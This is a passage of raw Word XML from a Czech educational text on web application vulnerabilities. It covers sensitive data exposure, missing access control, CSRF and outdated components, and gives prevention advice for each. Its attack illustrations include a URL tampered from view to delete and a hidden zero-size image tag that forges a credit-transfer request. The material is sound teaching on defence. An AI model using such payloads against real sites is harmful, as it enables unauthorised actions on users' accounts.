      <w:r w:rsidR="00E97C30">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stejné heslo jako do své emailové schránky, </w:t>
      </w:r>
      <w:r w:rsidR="00E97C30">
        <w:t xml:space="preserve">tak k ní útočník </w:t>
      </w:r>
      <w:r>
        <w:t>získá přístup</w:t>
      </w:r>
      <w:r w:rsidR="00E97C30">
        <w:t xml:space="preserve"> také</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00E97C30">
        <w:t>využije ji k infiltraci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dalš</w:t>
      </w:r>
      <w:r w:rsidR="00E97C30">
        <w:t>ích uživatel</w:t>
      </w:r>
      <w:r w:rsidR="00364AB7">
        <w:t>em</w:t>
      </w:r>
      <w:r w:rsidR="00E97C30">
        <w:t xml:space="preserve"> využívaných</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> služ</w:t>
      </w:r>
      <w:r w:rsidR="00E97C30">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>b. V krajním případě je možné ukrást celou jeho virtuální identitu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc387327827"/>
      <w:r>
        <w:t>Ukázka útoku</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Útočník získá přístup k údajům v databázi (například provedením </w:t>
      </w:r>
      <w:r w:rsidRPr="005C4915">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C4915">
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> útoku nebo díky špatnému nastavení zabezpečení serveru). Přihlašovací údaje jsou uložené v otevřené podobě nebo se využívá velmi slabého šifrování, tudíž útočník získává přístup k účtu uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aplikace sice citlivá data před uložením šifruje velmi silným šifrovacím algoritmem, ale nepoužívá zabezpečený přenos dat mezi klientem a serverem. Útočník monitoruje provoz na síti (například na nezabezpečené bezdrátové síti) a</w:t>
      </w:r>
      <w:r w:rsidR="005C4915">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">zachytí buď přímo přihlašovací údaje uživatele, nebo identifikátor jeho relace, díky čemuž opět získává kontrolu nad </w:t>
      </w:r>
      <w:r w:rsidR="005C4915">
        <w:t xml:space="preserve">jeho </w:t>
      </w:r>
      <w:r>
        <w:t>účtem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc387327828"/>
      <w:r>
        <w:t>Jak předcházet této zranitelnosti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Všechny zneužitelné uživatelské údaje (přihlašovací hesla, čísla platebních karet, čísla dokladů apod.) ukládat v šifrované podobě. Přenos těchto dat musí být zabezpečen, například pomocí </w:t>
      </w:r>
      <w:r w:rsidR="008A4F85">
        <w:t>šifrování TSL/</w:t>
      </w:r>
      <w:r w:rsidRPr="008A4F85">
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Neukládat zbytečně údaje, které nutně není třeba shromažďovat. Co není uloženo, nemůže být zneužito.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pro šifrování využívat silný algoritmus a zabezpečit, aby i šifrovací klíče nemohly být zneužity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vypnout funkci automatického dokončování u formulářů, které slouží k zadávání citlivých dat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F0535" w:rsidRDefault="004D2639" w:rsidP="007F0535">
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344905"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \p 12 \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10, s. 12]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc372462432"/>
      <w:bookmarkStart w:id="94" w:name="_Toc387327829"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kontrola oprávnění na aplikační úrovni</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t xml:space="preserve">Tato zranitelnost částečně souvisí s již popsanou nezabezpečenou přímou referencí objektů, jen s tím rozdílem, že se jedná o nezabezpečený přístup k funkcím aplikace. Části aplikace poskytující danou funkcionalitu spoléhají na to, že </w:t>
      </w:r>
      <w:r w:rsidR="00805DC1">
        <w:t xml:space="preserve">pro neoprávněné uživatele </w:t>
      </w:r>
      <w:r>
        <w:t>nejsou dostupné v</w:t>
      </w:r>
      <w:r w:rsidR="00232360">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>uživatelském rozhraní</w:t>
      </w:r>
      <w:r w:rsidR="00805DC1">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">samy </w:t>
      </w:r>
      <w:r w:rsidR="008529BA">
        <w:t xml:space="preserve">už </w:t>
      </w:r>
      <w:r>
        <w:t>žádnou kontrolu neprovádí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc387327830"/>
      <w:r>
        <w:t>Ukázka útoku</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t xml:space="preserve">Útočník (uživatel systému) má právo prohlížet si články v redakčním systému, ale nemá právo je ze systému smazat. Při přístupu k článku se používá URL parametr označující akci, kterou chce uživatel vykonat: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.example.com/articles?id=1051&amp;action=view</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Útočník změní název akce následovně:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.example.com/articles?id=1051&amp;action=delete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Vzhledem k tomu, že se oprávnění k mazání článků kontroluje pouze na úrovní uživatelského rozhraní, ale ne na aplikační úrovni, dojde ke smazání článku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc387327831"/>
      <w:r>
        <w:t>Jak předcházet této zranitelnosti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Oprávnění uživatele k využití funkcionality musí být kontrolováno vždy i přímo na aplikační úrovni, n</w:t>
      </w:r>
      <w:r w:rsidR="000F080D">
        <w:t>ikoliv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pouze na prezentační úrovni.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F0535" w:rsidRDefault="004D2639" w:rsidP="007F5BF2">
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344906"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \p 13 \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10, s. 13]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc372462433"/>
      <w:bookmarkStart w:id="98" w:name="_Toc387327832"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cross</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Forgery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5805">
        <w:t>Cross</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C5805">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5805">
        <w:t>Site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C5805">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5805">
        <w:t>Request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C5805">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5805">
        <w:t>Forgery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> se nazývá útok, který podvrhne požadavek na zranitelnou aplikaci s cílem provedení akce v kontextu přihlášeného uživatele, přičemž k podvrhnutí tohoto požadavku stačí, aby uživatel přistoupil na stránky ovládané útočníkem a současně byl ve stejném prohlížeči přihlášený ke zranitelné aplikaci.  Samotná zranitelnost spočívá v</w:t>
      </w:r>
      <w:r w:rsidR="006904C1">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>tom, že k provedení dané akce stačí, aby na server přišel požadavek s validním identifikátorem relace přihlášeného uživatele bez dalšího tajného kódu (</w:t>
      </w:r>
      <w:r w:rsidRPr="006904C1">
        <w:t xml:space="preserve">autorizačního </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006904C1">
        <w:t>tokenu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) pro ověření autentičnosti požadavku. K provedení tohoto útoku musí mít útočník určitou znalost napadené aplikace, aby byl schopný správně sestavit požadavek.</w:t>
      </w:r>
      <w:r w:rsidR="007F0535">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344910"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION mr0BvqfkkwAvCy3F \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[15]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc387327833"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ukázka útoku</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Aplikace umožňuje přeposílání kreditů (virtuálního platidla) mezi svými uživateli, přičemž k odeslání kreditů se využívá GET požadavku na následující adresu:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://example.com/transferCredit?amount=1000&amp;account=12345</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>URL parametr "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>amount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" určuje počet převáděných kreditů a "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>account</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" identifikuje účet, na který se kredity převádí. K této stránce mají přístup pouze přihlášení uživatelé, kredity se tedy vždy převádí z účtu aktuálně přihlášeného uživatele. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Útočník na svoji vlastní stránku obsahující například sbírku vtipných obrázků vloží mezi běžné obrázky následující kód:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA531C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">http://example.com/transferCredit?amount=1000&amp;account=19568" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="0" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="0" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Uživatel, který je přihlášen ke zranitelné aplikaci, ve stejném prohlížeči přistoupí na podvodnou stránku. Mezitím, co si prohlíží vtipné obrázky se převedlo jeho 1000 kreditů na útočníkův účet, protože jeho prohlížeč při snaze stáhnout podvodný obrázek zaslal požadavek na zranitelnou aplikaci žádající převod kreditů. Prohlížeč k požadavku přidal automaticky identifikátor relace platný pro doménu "example.com" a zranitelná aplikace nemůže rozlišit mezi autentickým a podvrhnutým požadavkem uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc387327834"/>
      <w:r>
        <w:t>Jak předcházet této zranitelnosti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pro odeslání dat na server používat </w:t>
      </w:r>
      <w:r w:rsidRPr="006904C1">
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> metodu HTTP protokolu místo </w:t>
      </w:r>
      <w:r w:rsidRPr="006904C1">
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Každému formuláři, který umožňuje provedení nějaké akce předat náhodný autorizační </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00214D32">
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, který se může uložit například do skrytého pole. Tento </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> musí být specifický pro přihlášeného uživatele</w:t>
      </w:r>
      <w:r w:rsidR="006904C1">
        <w:t xml:space="preserve"> a formulář</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Po odeslání formuláře je nutné kontrolovat, </w:t>
      </w:r>
      <w:r w:rsidR="006904C1">
        <w:t>zda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zaslaný </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> odpovídá </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tokenu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, který byl uživateli předán při vykreslování formuláře.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Před provedením akce vyžadovat opětovné přihlášení uživatele nebo vyplnění </w:t>
      </w:r>
      <w:r w:rsidRPr="006904C1">
        <w:t>CAPTCHA</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F0535" w:rsidRDefault="004D2639" w:rsidP="007F0535">
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344907"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \p 14 \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10, s. 14]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc372462434"/>
      <w:bookmarkStart w:id="102" w:name="_Toc387327835"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Komponenty se známými zranitelnostmi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t xml:space="preserve">Málokterá aplikace nepoužívá žádnou komponentu třetí strany. Většina vývojářů aplikací použije hotové řešení </w:t>
      </w:r>
      <w:r w:rsidR="006904C1">
        <w:t xml:space="preserve">nějaké funkcionality </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">například ve formě knihovny, než aby vyvíjeli svoje vlastní. Problémem je, že nad kódem komponent třetích stran nemají kontrolu (pokud se nejedná o </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB38C3">
        <w:t xml:space="preserve">open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB38C3">
        <w:t>source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> řešení). Ve kterékoliv použité komponentě může být bezpečnostní chyba, které bude útočník moci využít tak dlouho, dokud nebude komponenta aktualizována na novější verzi opravující tuto chybu. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc387327836"/>
      <w:r>
        <w:t>Jak předcházet této zranitelnosti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identifikovat veškeré použité komponenty třetích stran</w:t>
      </w:r>
      <w:r w:rsidRPr="001A3625">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a jejich verze, které aplikace využívá.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sledovat vývoj těchto komponent, zjišťovat, jestli se u používané verze neobjevila bezpečnostní chyba a v případě vydání nové verze komponentu co nejdříve aktualizovat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Komponentu, která trpí bezpečnostními nedostatky a již se dále nevyvíjí nahradit za její aktivně vyvíjenou nebo alespoň udržovanou alternativu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F0535" w:rsidRPr="001A3625" w:rsidRDefault="004D2639" w:rsidP="007F0535">
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344908"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \p 15 \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10, s. 15]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc372462435"/>
      <w:bookmarkStart w:id="105" w:name="_Toc387327837"/>
      <w:r>
        <w:t>Neověřené přesměrování</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:bookmarkEnd w:id="105"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Internetové aplikace mohou při přístupu k</w:t>
      </w:r>
      <w:r w:rsidR="006904C1">
        <w:t xml:space="preserve"> určité </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stránce přesměrovávat své uživatele na jinou stránku. Nejčastěji se tak děje pomocí zaslání HTTP odpovědi s kódem v rozsahu 300-307, typicky je to 302. Další možný způsob přesměrování je vložení </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A412A7">
        <w:t>javascriptu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do stránky, který provede změnu adresy po jejím načtení. Oba dva tyto způsoby vyžadují zaslání odpovědi ze serveru prohlížeči, který si sám vyžádá novou stránku. Třetím využívaným způsobem je přesměrování, které se </w:t>
      </w:r>
      <w:r w:rsidR="006904C1">
        <w:t>provádí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pouze na straně serveru, kdy server prohlížeči předá </w:t>
      </w:r>
      <w:r w:rsidR="006904C1">
        <w:t xml:space="preserve">již  </w:t>
      </w:r>
      <w:r>
        <w:t>výslednou stránku, klientský prohlížeč se tedy o tomto druhu přesměrování nedozví. Problém nastává v případě, kdy je možné pomocí dat zaslaných na server ovlivnit adresu, na kterou bude uživatel přesměrován.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc387327838"/>
      <w:r>
        <w:t>Ukázka útoku</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
